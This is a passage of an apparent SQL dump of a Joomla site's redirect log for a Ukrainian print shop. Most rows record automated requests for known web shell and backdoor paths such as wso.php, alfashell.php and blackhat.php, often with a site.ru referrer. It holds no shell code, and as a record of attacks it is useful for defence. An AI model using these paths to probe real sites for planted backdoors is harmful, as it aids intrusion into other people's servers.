00:00:00',301),(16324,'https://ekvatorprint.com.ua/rtf557lt/mini-shell-backdoor-download.php',NULL,'http://site.ru','',2,0,'2020-03-26 02:03:13','0000-00-00 00:00:00',301),(16325,'https://ekvatorprint.com.ua/content-wrapper.php',NULL,'http://site.ru','',3,0,'2020-03-26 02:57:55','0000-00-00 00:00:00',301),(16326,'https://ekvatorprint.com.ua/mm.php',NULL,'http://site.ru','',2,0,'2020-03-26 03:51:05','0000-00-00 00:00:00',301),(16327,'https://ekvatorprint.com.ua/wp-xml.php',NULL,'http://site.ru','',4,0,'2020-03-26 04:19:52','0000-00-00 00:00:00',301),(16328,'https://ekvatorprint.com.ua/wp-active.php',NULL,'http://site.ru','',3,0,'2020-03-26 04:50:36','0000-00-00 00:00:00',301),(16329,'http://ekvatorprint.com.ua/www/license.txt',NULL,'http://ekvatorprint.com.ua/www/license.txt','',3,0,'2020-03-26 06:23:56','0000-00-00 00:00:00',301),(16330,'https://ekvatorprint.com.ua/sllolx.php.suspected',NULL,'http://site.ru','',2,0,'2020-03-26 06:40:12','0000-00-00 00:00:00',301),(16331,'https://ekvatorprint.com.ua/logs/logo_img.php',NULL,'http://site.ru','',6,0,'2020-03-26 10:31:00','0000-00-00 00:00:00',301),(16332,'http://ekvatorprint.com.ua/main/license.txt',NULL,'http://ekvatorprint.com.ua/main/license.txt','',1,0,'2020-03-26 12:40:46','0000-00-00 00:00:00',301),(16333,'https://ekvatorprint.com.ua/158.php',NULL,'http://site.ru','',4,0,'2020-03-26 13:58:03','0000-00-00 00:00:00',301),(16334,'https://ekvatorprint.com.ua/jemobile.php',NULL,'http://site.ru','',2,0,'2020-03-26 15:26:23','0000-00-00 00:00:00',301),(16335,'https://ekvatorprint.com.ua/rss.xml',NULL,'','',26,0,'2020-03-26 17:34:54','0000-00-00 00:00:00',301),(16336,'https://ekvatorprint.com.ua/?format=feed&type=rss',NULL,'','',25,0,'2020-03-26 17:34:55','0000-00-00 00:00:00',301),(16337,'https://ekvatorprint.com.ua/index.rss',NULL,'','',25,0,'2020-03-26 17:34:57','0000-00-00 00:00:00',301),(16338,'https://ekvatorprint.com.ua/feeds',NULL,'','',24,0,'2020-03-26 17:34:57','0000-00-00 00:00:00',301),(16339,'https://ekvatorprint.com.ua/atom.xml',NULL,'','',34,0,'2020-03-26 17:34:58','0000-00-00 00:00:00',301),(16340,'https://ekvatorprint.com.ua/index.atom',NULL,'','',18,0,'2020-03-26 17:34:59','0000-00-00 00:00:00',301),(16341,'https://ekvatorprint.com.ua/index.rdf',NULL,'','',25,0,'2020-03-26 17:34:59','0000-00-00 00:00:00',301),(16342,'https://ekvatorprint.com.ua/index.xml',NULL,'','',25,0,'2020-03-26 17:35:00','0000-00-00 00:00:00',301),(16343,'http://ekvatorprint.com.ua/reserv/license.txt',NULL,'http://ekvatorprint.com.ua/reserv/license.txt','',1,0,'2020-03-26 19:12:38','0000-00-00 00:00:00',301),(16344,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/template/testcasemethod.tpl.dist',NULL,'http://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/Util/PHP/Template/TestCaseMethod.tpl.dist','',2,0,'2020-03-27 05:02:41','0000-00-00 00:00:00',301),(16345,'https://ekvatorprint.com.ua/images/wso.php',NULL,'http://site.ru','',7,0,'2020-03-27 06:12:15','0000-00-00 00:00:00',301),(16346,'https://ekvatorprint.com.ua/miwed.php',NULL,'http://site.ru','',5,0,'2020-03-27 06:13:35','0000-00-00 00:00:00',301),(16347,'https://ekvatorprint.com.ua/cry.php',NULL,'http://site.ru','',3,0,'2020-03-27 06:19:16','0000-00-00 00:00:00',301),(16348,'http://ekvatorprint.com.ua/arx/license.txt',NULL,'http://ekvatorprint.com.ua/arx/license.txt','',1,0,'2020-03-28 08:51:06','0000-00-00 00:00:00',301),(16349,'https://ekvatorprint.com.ua/gtde.php',NULL,'','',3,0,'2020-03-28 09:15:45','0000-00-00 00:00:00',301),(16350,'http://ekvatorprint.com.ua/res/license.txt',NULL,'http://ekvatorprint.com.ua/res/license.txt','',1,0,'2020-03-28 15:15:52','0000-00-00 00:00:00',301),(16351,'http://ekvatorprint.com.ua/back/license.txt',NULL,'http://ekvatorprint.com.ua/back/license.txt','',2,0,'2020-03-29 03:07:30','0000-00-00 00:00:00',301),(16352,'https://ekvatorprint.com.ua/hipay/popup-pomo.php',NULL,'http://site.ru','',1,0,'2020-03-29 09:39:02','0000-00-00 00:00:00',301),(16353,'https://ekvatorprint.com.ua/components/com_banners/helpers/theme.php',NULL,'http://site.ru','',2,0,'2020-03-29 10:01:23','0000-00-00 00:00:00',301),(16354,'https://ekvatorprint.com.ua/modules/mod_footer/tmpl/popup-pomo.php',NULL,'http://site.ru','',3,0,'2020-03-29 11:24:17','0000-00-00 00:00:00',301),(16355,'https://ekvatorprint.com.ua/cache/404.php',NULL,'http://site.ru','',4,0,'2020-03-29 11:26:41','0000-00-00 00:00:00',301),(16356,'https://ekvatorprint.com.ua/plugins/header_img.php.suspected',NULL,'http://site.ru','',7,0,'2020-03-29 11:47:59','0000-00-00 00:00:00',301),(16357,'https://ekvatorprint.com.ua/components/sec.php',NULL,'http://site.ru','',5,0,'2020-03-29 12:15:27','0000-00-00 00:00:00',301),(16358,'https://ekvatorprint.com.ua/templates/atomic/cutia.php',NULL,'http://site.ru','',1,0,'2020-03-29 13:10:35','0000-00-00 00:00:00',301),(16359,'https://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/sittir.php',NULL,'http://site.ru','',5,0,'2020-03-29 13:12:14','0000-00-00 00:00:00',301),(16360,'https://ekvatorprint.com.ua/images/stories/ok.php',NULL,'http://site.ru','',3,0,'2020-03-29 13:36:47','0000-00-00 00:00:00',301),(16361,'https://ekvatorprint.com.ua/includes/404.php',NULL,'http://site.ru','',4,0,'2020-03-29 13:40:45','0000-00-00 00:00:00',301),(16362,'https://ekvatorprint.com.ua/components/marvins.php',NULL,'http://site.ru','',9,0,'2020-03-29 14:15:09','0000-00-00 00:00:00',301),(16363,'https://ekvatorprint.com.ua/lite.php',NULL,'http://site.ru','',3,0,'2020-03-29 14:56:57','0000-00-00 00:00:00',301),(16364,'https://ekvatorprint.com.ua/modules/mod_poll/tmpl/my.php',NULL,'http://site.ru','',2,0,'2020-03-29 15:49:22','0000-00-00 00:00:00',301),(16365,'https://ekvatorprint.com.ua/components/com_media/mark.php',NULL,'http://site.ru','',7,0,'2020-03-29 17:04:46','0000-00-00 00:00:00',301),(16366,'https://ekvatorprint.com.ua/images/images.php',NULL,'http://site.ru','',3,0,'2020-03-29 17:12:57','0000-00-00 00:00:00',301),(16367,'https://ekvatorprint.com.ua/phqmv.php',NULL,'','',3,0,'2020-03-30 00:06:27','0000-00-00 00:00:00',301),(16368,'https://ekvatorprint.com.ua/cache/blackhat.php',NULL,'http://site.ru','',16,0,'2020-03-30 07:18:52','0000-00-00 00:00:00',301),(16369,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/mod_simplefileuploadv1.3.xml',NULL,'','',2,0,'2020-04-01 01:21:27','0000-00-00 00:00:00',301),(16370,'https://ekvatorprint.com.ua/configbak.php',NULL,'','',3,0,'2020-04-05 17:49:29','0000-00-00 00:00:00',301),(16371,'https://ekvatorprint.com.ua/feed/',NULL,'','',29,0,'2020-04-06 02:52:37','0000-00-00 00:00:00',301),(16372,'http://ekvatorprint.com.ua/images/style2/menu_bg_active.png',NULL,'https://ekvatorprint.com.ua/trebovaniya','',6,0,'2020-04-06 10:47:41','0000-00-00 00:00:00',301),(16373,'https://ekvatorprint.com.ua/printing-on-canvass',NULL,'','',1,0,'2020-04-06 13:42:25','0000-00-00 00:00:00',301),(16374,'https://ekvatorprint.com.ua/wso2.php',NULL,'http://site.ru','',4,0,'2020-04-07 07:41:02','0000-00-00 00:00:00',301),(16375,'https://ekvatorprint.com.ua/cache/ruf.php5',NULL,'http://site.ru','',4,0,'2020-04-07 08:09:38','0000-00-00 00:00:00',301),(16376,'https://ekvatorprint.com.ua/cache/ruf.php5.suspected',NULL,'http://site.ru','',1,0,'2020-04-07 08:12:00','0000-00-00 00:00:00',301),(16377,'https://ekvatorprint.com.ua/wso2.php.suspected',NULL,'http://site.ru','',4,0,'2020-04-07 08:34:47','0000-00-00 00:00:00',301),(16378,'https://ekvatorprint.com.ua/ganks.php.php',NULL,'http://site.ru','',8,0,'2020-04-07 08:38:05','0000-00-00 00:00:00',301),(16379,'https://ekvatorprint.com.ua/ruf.php5',NULL,'http://site.ru','',8,0,'2020-04-07 09:05:38','0000-00-00 00:00:00',301),(16380,'https://ekvatorprint.com.ua/ix.php.php',NULL,'http://site.ru','',4,0,'2020-04-07 13:03:14','0000-00-00 00:00:00',301),(16381,'https://ekvatorprint.com.ua/templates/beez3/content-post.php',NULL,'http://site.ru','',3,0,'2020-04-07 13:35:37','0000-00-00 00:00:00',301),(16382,'https://ekvatorprint.com.ua/templates/beez3/simple.php5.suspected',NULL,'http://site.ru','',3,0,'2020-04-07 13:35:43','0000-00-00 00:00:00',301),(16383,'https://ekvatorprint.com.ua/tesa.php',NULL,'http://site.ru','',2,0,'2020-04-07 13:59:43','0000-00-00 00:00:00',301),(16384,'https://ekvatorprint.com.ua/templates/protostar/simple.php5.suspected',NULL,'http://site.ru','',2,0,'2020-04-07 14:04:06','0000-00-00 00:00:00',301),(16385,'https://ekvatorprint.com.ua/templates/hotel/cnn.php',NULL,'http://site.ru','',3,0,'2020-04-07 14:36:11','0000-00-00 00:00:00',301),(16386,'https://ekvatorprint.com.ua/administrator/components/com_admin/sql/updates/postgresql/gank.php.php',NULL,'http://site.ru','',1,0,'2020-04-07 14:56:16','0000-00-00 00:00:00',301),(16387,'https://ekvatorprint.com.ua/administrator/templates/isis/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-04-07 15:22:50','0000-00-00 00:00:00',301),(16388,'https://ekvatorprint.com.ua/media/media/media.php',NULL,'http://site.ru','',2,0,'2020-04-07 15:24:59','0000-00-00 00:00:00',301),(16389,'https://ekvatorprint.com.ua/modules/mod_footer/tmpl/index.php',NULL,'http://site.ru','',9,0,'2020-04-07 15:48:52','0000-00-00 00:00:00',301),(16390,'https://ekvatorprint.com.ua/libraries/joomla/template/ash.php',NULL,'http://site.ru','',2,0,'2020-04-07 15:54:35','0000-00-00 00:00:00',301),(16391,'https://ekvatorprint.com.ua/_1_administrator/edit/wertr6.php',NULL,'http://site.ru','',3,0,'2020-04-07 16:20:40','0000-00-00 00:00:00',301),(16392,'https://ekvatorprint.com.ua/wp-admin/network/sitenet.php5',NULL,'http://site.ru','',2,0,'2020-04-07 16:44:53','0000-00-00 00:00:00',301),(16393,'https://ekvatorprint.com.ua/wp-admin/network/sitenet.php5',NULL,'http://site.ru','',1,0,'2020-04-07 16:44:53','0000-00-00 00:00:00',301),(16394,'https://ekvatorprint.com.ua/qxonetrmsq.php',NULL,'http://site.ru','',1,0,'2020-04-07 17:11:47','0000-00-00 00:00:00',301),(16395,'https://ekvatorprint.com.ua/wp-admin/network/sitenets.php5.suspected',NULL,'http://site.ru','',3,0,'2020-04-07 17:55:55','0000-00-00 00:00:00',301),(16396,'https://ekvatorprint.com.ua/modules/mod_search/mide.php',NULL,'http://site.ru','',5,0,'2020-04-07 19:43:47','0000-00-00 00:00:00',301),(16397,'https://ekvatorprint.com.ua/components/com_content/controllers/images.php',NULL,'http://site.ru','',3,0,'2020-04-07 19:45:28','0000-00-00 00:00:00',301),(16398,'https://ekvatorprint.com.ua/list.php',NULL,'http://site.ru','',8,0,'2020-04-07 19:46:31','0000-00-00 00:00:00',301),(16399,'https://ekvatorprint.com.ua/administrator/components/com_komento/assets/server.php',NULL,'http://site.ru','',1,0,'2020-04-07 20:37:57','0000-00-00 00:00:00',301),(16400,'https://ekvatorprint.com.ua/web/blackhat.php',NULL,'http://site.ru','',2,0,'2020-04-07 21:12:28','0000-00-00 00:00:00',301),(16401,'https://ekvatorprint.com.ua/templates/beez3/simple.php5',NULL,'http://site.ru','',3,0,'2020-04-07 23:19:56','0000-00-00 00:00:00',301),(16402,'https://ekvatorprint.com.ua/libraries/joomla/installer/adapters/data.php',NULL,'http://site.ru','',2,0,'2020-04-07 23:46:16','0000-00-00 00:00:00',301),(16403,'https://ekvatorprint.com.ua/wp-content/themes/twentynineteen/styles.php.suspected',NULL,'http://site.ru','',3,0,'2020-04-07 23:50:08','0000-00-00 00:00:00',301),(16404,'https://ekvatorprint.com.ua/libraries/phputf8/helper.php',NULL,'http://site.ru','',3,0,'2020-04-07 23:52:41','0000-00-00 00:00:00',301),(16405,'https://ekvatorprint.com.ua/language/404.php.suspected',NULL,'http://site.ru','',6,0,'2020-04-08 00:40:24','0000-00-00 00:00:00',301),(16406,'https://ekvatorprint.com.ua/administrator/components/com_ninjaxplorer/style/data.php',NULL,'http://site.ru','',2,0,'2020-04-08 02:30:36','0000-00-00 00:00:00',301),(16407,'https://ekvatorprint.com.ua/web/cache/content-post.php',NULL,'http://site.ru','',4,0,'2020-04-08 02:59:12','0000-00-00 00:00:00',301),(16408,'https://ekvatorprint.com.ua/media/mailto/k.php',NULL,'http://site.ru','',2,0,'2020-04-08 03:46:13','0000-00-00 00:00:00',301),(16409,'https://ekvatorprint.com.ua/salim.php',NULL,'http://site.ru','',2,0,'2020-04-08 03:46:26','0000-00-00 00:00:00',301),(16410,'https://ekvatorprint.com.ua/templates/baseline/evjosh.php',NULL,'http://site.ru','',1,0,'2020-04-08 04:04:05','0000-00-00 00:00:00',301),(16411,'https://ekvatorprint.com.ua/components/com_phocaphoto/views/gank.php.php',NULL,'http://site.ru','',2,0,'2020-04-08 04:16:03','0000-00-00 00:00:00',301),(16412,'https://ekvatorprint.com.ua/layouts/simple.php5',NULL,'http://site.ru','',5,0,'2020-04-08 04:22:52','0000-00-00 00:00:00',301),(16413,'https://ekvatorprint.com.ua/__macosx/templates/beez3/html/com_weblinks/streamed.php',NULL,'http://site.ru','',1,0,'2020-04-08 05:05:44','0000-00-00 00:00:00',301),(16414,'https://ekvatorprint.com.ua/libraries/joomla/session/storage/maybe.php',NULL,'http://site.ru','',1,0,'2020-04-08 05:34:04','0000-00-00 00:00:00',301),(16415,'https://ekvatorprint.com.ua/bin/wp-info.php',NULL,'http://site.ru','',3,0,'2020-04-08 05:37:22','0000-00-00 00:00:00',301),(16416,'https://ekvatorprint.com.ua/components/com_foxcontact/zc.php',NULL,'http://site.ru','',2,0,'2020-04-08 06:00:40','0000-00-00 00:00:00',301),(16417,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/noneditable/img.php',NULL,'http://site.ru','',4,0,'2020-04-08 06:31:13','0000-00-00 00:00:00',301),(16418,'https://ekvatorprint.com.ua/kuy.php',NULL,'http://site.ru','',4,0,'2020-04-08 06:59:11','0000-00-00 00:00:00',301),(16419,'https://ekvatorprint.com.ua/modules/logs.php',NULL,'http://site.ru','',1,0,'2020-04-08 07:49:54','0000-00-00 00:00:00',301),(16420,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/w.php',NULL,'http://site.ru','',7,0,'2020-04-08 07:50:23','0000-00-00 00:00:00',301),(16421,'https://ekvatorprint.com.ua/components/com_content/wso3.php',NULL,'http://site.ru','',2,0,'2020-04-08 07:51:03','0000-00-00 00:00:00',301),(16422,'https://ekvatorprint.com.ua/layouts/joomla/html/formbehavior/mashaji2.php',NULL,'http://site.ru','',1,0,'2020-04-08 08:16:28','0000-00-00 00:00:00',301),(16423,'https://ekvatorprint.com.ua/alfashell.php',NULL,'http://site.ru','',5,0,'2020-04-08 08:40:42','0000-00-00 00:00:00',301),(16424,'https://ekvatorprint.com.ua/modules/wp-info.php',NULL,'http://site.ru','',2,0,'2020-04-08 08:43:21','0000-00-00 00:00:00',301),(16425,'https://ekvatorprint.com.ua/images/chogla.php',NULL,'http://site.ru','',2,0,'2020-04-08 08:43:35','0000-00-00 00:00:00',301),(16426,'https://ekvatorprint.com.ua/images/bt/wp-infos.php',NULL,'http://site.ru','',1,0,'2020-04-08 09:05:52','0000-00-00 00:00:00',301),(16427,'https://ekvatorprint.com.ua/administrator/modules/mod_latest/tmpl/gank.php.php',NULL,'http://site.ru','',1,0,'2020-04-08 09:14:35','0000-00-00 00:00:00',301),(16428,'https://ekvatorprint.com.ua/libraries/joomla/document/feed/wso2.php',NULL,'http://site.ru','',4,0,'2020-04-08 09:56:47','0000-00-00 00:00:00',301),(16429,'https://ekvatorprint.com.ua/administrator/components/com_ninjaxplorer/style/content-post.php',NULL,'http://site.ru','',2,0,'2020-04-08 10:28:15','0000-00-00 00:00:00',301),(16430,'https://ekvatorprint.com.ua/modules/mod_insider/ruf.php5',NULL,'http://site.ru','',3,0,'2020-04-08 10:47:54','0000-00-00 00:00:00',301),(16431,'https://ekvatorprint.com.ua/libraries/joomla/template/module/function/data.php',NULL,'http://site.ru','',2,0,'2020-04-08 10:49:31','0000-00-00 00:00:00',301),(16432,'https://ekvatorprint.com.ua/ruf.php5.suspected',NULL,'http://site.ru','',3,0,'2020-04-08 10:51:46','0000-00-00 00:00:00',301),(16433,'https://ekvatorprint.com.ua/media/wp-info.php',NULL,'http://site.ru','',1,0,'2020-04-08 10:52:21','0000-00-00 00:00:00',301),(16434,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/link/mashaji2.php',NULL,'http://site.ru','',1,0,'2020-04-08 11:16:52','0000-00-00 00:00:00',301),(16435,'https://ekvatorprint.com.ua/libraries/seter.php.suspected',NULL,'http://site.ru','',1,0,'2020-04-08 11:42:42','0000-00-00 00:00:00',301),(16436,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/dm2.php',NULL,'http://site.ru','',1,0,'2020-04-08 12:55:51','0000-00-00 00:00:00',301),(16437,'https://ekvatorprint.com.ua/administrator/components/com_search/wso2.php',NULL,'http://site.ru','',2,0,'2020-04-08 13:47:52','0000-00-00 00:00:00',301),(16438,'https://ekvatorprint.com.ua/administrator/components/com_ninjaxplorer/libraries/archive/a.php',NULL,'http://site.ru','',1,0,'2020-04-08 14:08:28','0000-00-00 00:00:00',301),(16439,'https://ekvatorprint.com.ua/timco-aero.com/cache/content-post.php',NULL,'http://site.ru','',6,0,'2020-04-08 14:15:20','0000-00-00 00:00:00',301),(16440,'https://ekvatorprint.com.ua/feeds/',NULL,'','',10,0,'2020-04-08 14:16:32','0000-00-00 00:00:00',301),(16441,'https://ekvatorprint.com.ua/components/com_banners/helpers/class.php',NULL,'http://site.ru','',3,0,'2020-04-08 14:33:10','0000-00-00 00:00:00',301),(16442,'https://ekvatorprint.com.ua/administrator/components/com_ninjaxplorer/libraries/archive/predicate/data.php',NULL,'http://site.ru','',1,0,'2020-04-08 14:41:43','0000-00-00 00:00:00',301),(16443,'https://ekvatorprint.com.ua/mod/includes/plugins/infossagradas/includes.php',NULL,'http://site.ru','',3,0,'2020-04-08 14:58:46','0000-00-00 00:00:00',301),(16444,'https://ekvatorprint.com.ua/images/pe.hahtw1rg.php',NULL,'http://site.ru','',1,0,'2020-04-08 15:46:34','0000-00-00 00:00:00',301),(16445,'https://ekvatorprint.com.ua/administrator/components/com_frontpage/views/class-wp-filesystemss.php',NULL,'http://site.ru','',2,0,'2020-04-08 16:16:06','0000-00-00 00:00:00',301),(16446,'https://ekvatorprint.com.ua/libraries/joomla/environment/content-post.php',NULL,'http://site.ru','',1,0,'2020-04-08 17:02:50','0000-00-00 00:00:00',301),(16447,'https://ekvatorprint.com.ua/images/sampledata/include.php',NULL,'http://site.ru','',2,0,'2020-04-08 18:25:42','0000-00-00 00:00:00',301),(16448,'https://ekvatorprint.com.ua/test/content-post.php',NULL,'http://site.ru','',4,0,'2020-04-08 20:17:30','0000-00-00 00:00:00',301),(16449,'https://ekvatorprint.com.ua/templates/protostar/simple.php5',NULL,'http://site.ru','',2,0,'2020-04-08 20:20:06','0000-00-00 00:00:00',301),(16450,'https://ekvatorprint.com.ua/plugins/content/upgrade/upgrade.php',NULL,'http://site.ru','',4,0,'2020-04-08 20:34:44','0000-00-00 00:00:00',301),(16451,'https://ekvatorprint.com.ua/templates/beez/ic.php',NULL,'http://site.ru','',3,0,'2020-04-08 21:10:15','0000-00-00 00:00:00',301),(16452,'https://ekvatorprint.com.ua/components/com_wrapper/links.php',NULL,'http://site.ru','',10,0,'2020-04-08 22:20:56','0000-00-00 00:00:00',301),(16453,'https://ekvatorprint.com.ua/administrator/help/content-post.php',NULL,'http://site.ru','',7,0,'2020-04-08 23:13:47','0000-00-00 00:00:00',301),(16454,'https://ekvatorprint.com.ua/administrator/modules/mod_latest/ajax.inc.php',NULL,'http://site.ru','',2,0,'2020-04-08 23:35:00','0000-00-00 00:00:00',301),(16455,'https://ekvatorprint.com.ua/components/com_tabulizer/assets/images/wp-side.php.suspected',NULL,'http://site.ru','',5,0,'2020-04-09 00:31:27','0000-00-00 00:00:00',301),(16456,'https://ekvatorprint.com.ua/components/com_foxcontact/0byte.php',NULL,'http://site.ru','',1,0,'2020-04-09 02:10:48','0000-00-00 00:00:00',301),(16457,'https://ekvatorprint.com.ua/modules/mod_insider/ganks.php.php',NULL,'http://site.ru','',3,0,'2020-04-09 02:26:24','0000-00-00 00:00:00',301),(16458,'https://ekvatorprint.com.ua/.licences.php',NULL,'http://site.ru','',3,0,'2020-04-09 04:06:05','0000-00-00 00:00:00',301),(16459,'https://ekvatorprint.com.ua/language/wp-info.php',NULL,'http://site.ru','',4,0,'2020-04-09 04:10:45','0000-00-00 00:00:00',301),(16460,'https://ekvatorprint.com.ua/templates/atomic/ganks.php.php',NULL,'http://site.ru','',3,0,'2020-04-09 04:56:35','0000-00-00 00:00:00',301),(16461,'https://ekvatorprint.com.ua/cache/com_languages/dkbxnsh.php',NULL,'http://site.ru','',1,0,'2020-04-09 05:08:00','0000-00-00 00:00:00',301),(16462,'https://ekvatorprint.com.ua/components/com_foxcontact/kd.php',NULL,'http://site.ru','',2,0,'2020-04-09 05:55:16','0000-00-00 00:00:00',301),(16463,'https://ekvatorprint.com.ua/small.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-09 07:05:52','0000-00-00 00:00:00',301),(16464,'https://ekvatorprint.com.ua/logs/igchwc.php.suspected',NULL,'http://site.ru','',2,0,'2020-04-09 07:08:12','0000-00-00 00:00:00',301),(16465,'https://ekvatorprint.com.ua/administrator/conf.php',NULL,'http://site.ru','',2,0,'2020-04-09 07:27:45','0000-00-00 00:00:00',301),(16466,'https://ekvatorprint.com.ua/administrator/components/com_banners/helpers/html/wp-side.php',NULL,'http://site.ru','',4,0,'2020-04-09 07:57:06','0000-00-00 00:00:00',301),(16467,'https://ekvatorprint.com.ua/language/en-gb/en-gb.php',NULL,'http://site.ru','',7,0,'2020-04-09 08:44:46','0000-00-00 00:00:00',301),(16468,'https://ekvatorprint.com.ua/templates/beez3/ganks.php.php',NULL,'http://site.ru','',3,0,'2020-04-09 09:14:30','0000-00-00 00:00:00',301),(16469,'https://ekvatorprint.com.ua/components/com_users/views/reset/simple.php5',NULL,'http://site.ru','',2,0,'2020-04-09 09:36:22','0000-00-00 00:00:00',301),(16470,'https://ekvatorprint.com.ua/templates/beez3/list.php',NULL,'http://site.ru','',2,0,'2020-04-09 09:57:06','0000-00-00 00:00:00',301),(16471,'https://ekvatorprint.com.ua/web/content-post.php',NULL,'http://site.ru','',6,0,'2020-04-09 11:44:12','0000-00-00 00:00:00',301),(16472,'https://ekvatorprint.com.ua/webstat/wp-info.php',NULL,'http://site.ru','',2,0,'2020-04-09 13:08:56','0000-00-00 00:00:00',301),(16473,'https://ekvatorprint.com.ua/modules/mod_articles_news/tmpl/gank.php.php',NULL,'http://site.ru','',1,0,'2020-04-09 13:19:15','0000-00-00 00:00:00',301),(16474,'https://ekvatorprint.com.ua/web/cache/simple.php5',NULL,'http://site.ru','',2,0,'2020-04-09 14:36:18','0000-00-00 00:00:00',301),(16475,'https://ekvatorprint.com.ua/templates/protostar/blackhat.php',NULL,'http://site.ru','',3,0,'2020-04-09 14:59:32','0000-00-00 00:00:00',301),(16476,'https://ekvatorprint.com.ua/administrator/includes/5e43c60a1385c.php',NULL,'http://site.ru','',1,0,'2020-04-09 15:00:37','0000-00-00 00:00:00',301),(16477,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/lists/tw.php',NULL,'http://site.ru','',2,0,'2020-04-09 15:54:01','0000-00-00 00:00:00',301),(16478,'https://ekvatorprint.com.ua/administrator/min.php',NULL,'http://site.ru','',1,0,'2020-04-09 16:19:56','0000-00-00 00:00:00',301),(16479,'https://ekvatorprint.com.ua/modules/mod_activesynmasterkey/bm8z23.php',NULL,'http://site.ru','',1,0,'2020-04-09 16:22:14','0000-00-00 00:00:00',301),(16480,'https://ekvatorprint.com.ua/language/overrides/legacy38266.php',NULL,'http://site.ru','',2,0,'2020-04-09 17:04:23','0000-00-00 00:00:00',301),(16481,'https://ekvatorprint.com.ua/administrator/components/com_content/views/featured/tmpl/jhgfs.php',NULL,'http://site.ru','',1,0,'2020-04-09 19:33:29','0000-00-00 00:00:00',301),(16482,'https://ekvatorprint.com.ua/templates/atomic/ix.php.php',NULL,'http://site.ru','',2,0,'2020-04-09 19:35:36','0000-00-00 00:00:00',301),(16483,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/btk.php',NULL,'http://site.ru','',4,0,'2020-04-09 20:02:25','0000-00-00 00:00:00',301),(16484,'https://ekvatorprint.com.ua/tmp/odkudm.php',NULL,'http://site.ru','',1,0,'2020-04-09 23:12:12','0000-00-00 00:00:00',301),(16485,'https://ekvatorprint.com.ua/plugins/user/profile/nwtvfs.php',NULL,'http://site.ru','',2,0,'2020-04-09 23:21:13','0000-00-00 00:00:00',301),(16486,'https://ekvatorprint.com.ua/logs/a99.php',NULL,'http://site.ru','',4,0,'2020-04-09 23:48:47','0000-00-00 00:00:00',301),(16487,'https://ekvatorprint.com.ua/administrator/components/com_frontpage/io.php',NULL,'http://site.ru','',3,0,'2020-04-09 23:50:27','0000-00-00 00:00:00',301),(16488,'https://ekvatorprint.com.ua/components/com_k2/helpers/alfav3-encoded.php',NULL,'http://site.ru','',1,0,'2020-04-10 01:03:31','0000-00-00 00:00:00',301),(16489,'https://ekvatorprint.com.ua/layouts/plugins/user/terms/class-wp-filesystemss.php',NULL,'http://site.ru','',3,0,'2020-04-10 01:52:03','0000-00-00 00:00:00',301),(16490,'https://ekvatorprint.com.ua/media/mailto/0x.php',NULL,'http://site.ru','',2,0,'2020-04-10 02:38:43','0000-00-00 00:00:00',301),(16491,'https://ekvatorprint.com.ua/administrator/wp-info.php',NULL,'http://site.ru','',2,0,'2020-04-10 03:04:19','0000-00-00 00:00:00',301),(16492,'https://ekvatorprint.com.ua/xzeqaikkxu.php',NULL,'http://site.ru','',3,0,'2020-04-10 03:48:30','0000-00-00 00:00:00',301),(16493,'https://ekvatorprint.com.ua/prov/blackhat.php',NULL,'http://site.ru','',3,0,'2020-04-10 04:29:48','0000-00-00 00:00:00',301),(16494,'https://ekvatorprint.com.ua/libraries/joomla/session/class-wp-filesystemss.php',NULL,'http://site.ru','',1,0,'2020-04-10 05:15:10','0000-00-00 00:00:00',301),(16495,'https://ekvatorprint.com.ua/uploads/resume20171216205136_p8.php5.pdf',NULL,'http://site.ru','',1,0,'2020-04-10 06:00:51','0000-00-00 00:00:00',301),(16496,'https://ekvatorprint.com.ua/ltmp/wp-info.php',NULL,'http://site.ru','',1,0,'2020-04-10 06:38:39','0000-00-00 00:00:00',301),(16497,'https://ekvatorprint.com.ua/modules/mod_banners/tmpl/theme.php',NULL,'http://site.ru','',1,0,'2020-04-10 07:49:12','0000-00-00 00:00:00',301),(16498,'https://ekvatorprint.com.ua/modules/mod_simplefileuploadv1.3/elements/theme.php',NULL,'http://site.ru','',1,0,'2020-04-10 09:31:23','0000-00-00 00:00:00',301),(16499,'https://ekvatorprint.com.ua/__macosx/templates/beez3/html/com_content/category/5e3045a6daeff.php',NULL,'http://site.ru','',4,0,'2020-04-10 09:57:12','0000-00-00 00:00:00',301),(16500,'https://ekvatorprint.com.ua/plugins/search/weblinks/content-post.php.suspected',NULL,'http://site.ru','',3,0,'2020-04-10 10:01:03','0000-00-00 00:00:00',301),(16501,'https://ekvatorprint.com.ua/administrator/components/com_admin/views/sysinfo/gank.php.php',NULL,'http://site.ru','',2,0,'2020-04-10 14:05:22','0000-00-00 00:00:00',301),(16502,'https://ekvatorprint.com.ua/components/com_config/controller/images.php',NULL,'http://site.ru','',3,0,'2020-04-10 14:41:45','0000-00-00 00:00:00',301),(16503,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/advlist/simple.php5',NULL,'http://site.ru','',2,0,'2020-04-10 14:53:19','0000-00-00 00:00:00',301),(16504,'https://ekvatorprint.com.ua/site/components/com_media/mark.php',NULL,'http://site.ru','',4,0,'2020-04-10 15:20:19','0000-00-00 00:00:00',301),(16505,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/contextmenu/wp-crons.php',NULL,'http://site.ru','',1,0,'2020-04-10 15:23:06','0000-00-00 00:00:00',301),(16506,'https://ekvatorprint.com.ua/libraries.old/wp-info.php',NULL,'http://site.ru','',1,0,'2020-04-10 15:46:02','0000-00-00 00:00:00',301),(16507,'https://ekvatorprint.com.ua/modules/mod_roktabs/beautifu.php',NULL,'http://site.ru','',1,0,'2020-04-10 15:49:32','0000-00-00 00:00:00',301),(16508,'https://ekvatorprint.com.ua/media/editors/tinymce/plugins/media/data.php',NULL,'http://site.ru','',2,0,'2020-04-10 16:40:32','0000-00-00 00:00:00',301),(16509,'https://ekvatorprint.com.ua/images/wp-img.php',NULL,'http://site.ru','',3,0,'2020-04-10 